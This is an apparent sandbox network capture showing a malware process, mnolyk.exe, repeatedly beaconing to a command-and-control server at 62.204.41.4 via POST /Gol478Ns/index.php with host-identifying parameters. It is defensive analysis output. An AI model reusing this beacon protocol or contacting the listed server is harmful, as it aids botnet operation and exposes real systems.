                                                                    Feb 8, 2023 21:33:10.121092081 CET | 581 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:10.185554981 CET | 581 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
382 | 192.168.2.3 | 50085 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:10.354712963 CET | 582 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:10.417748928 CET | 582 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
383 | 192.168.2.3 | 50086 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:10.598459005 CET | 583 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:10.661725044 CET | 583 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
384 | 192.168.2.3 | 50087 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:10.839510918 CET | 584 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:10.902750969 CET | 584 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
385 | 192.168.2.3 | 50088 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:11.076338053 CET | 585 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:11.141714096 CET | 585 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
386 | 192.168.2.3 | 50089 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:11.324057102 CET | 586 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:11.387929916 CET | 586 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
387 | 192.168.2.3 | 50090 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:11.561825037 CET | 587 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:11.625634909 CET | 587 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
388 | 192.168.2.3 | 50091 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:11.991736889 CET | 588 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:12.058008909 CET | 588 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
389 | 192.168.2.3 | 50092 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:12.281172991 CET | 589 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:12.343425035 CET | 589 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49741 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:31:26.473669052 CET | 240 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:31:26.537626028 CET | 240 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
390 | 192.168.2.3 | 50093 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:12.595076084 CET | 590 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:12.658941031 CET | 590 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
391 | 192.168.2.3 | 50094 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:13.788321018 CET | 591 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:13.853844881 CET | 591 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
392 | 192.168.2.3 | 50095 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:15.244489908 CET | 592 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:15.309886932 CET | 592 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
393 | 192.168.2.3 | 50096 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:15.486305952 CET | 593 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:33:15.550494909 CET | 593 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
394 | 192.168.2.3 | 50097 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:33:15.743647099 CET | 594 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:15.807949066 CET | 594 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    395 | 192.168.2.3 | 50098 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:15.979666948 CET | 595 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.043409109 CET | 595 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    396 | 192.168.2.3 | 50099 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:16.214939117 CET | 596 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.318130970 CET | 596 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    397 | 192.168.2.3 | 50100 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:16.504024982 CET | 597 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.567168951 CET | 597 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    398 | 192.168.2.3 | 50101 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:16.750361919 CET | 598 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.814882994 CET | 598 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    399 | 192.168.2.3 | 50102 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:16.998377085 CET | 599 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
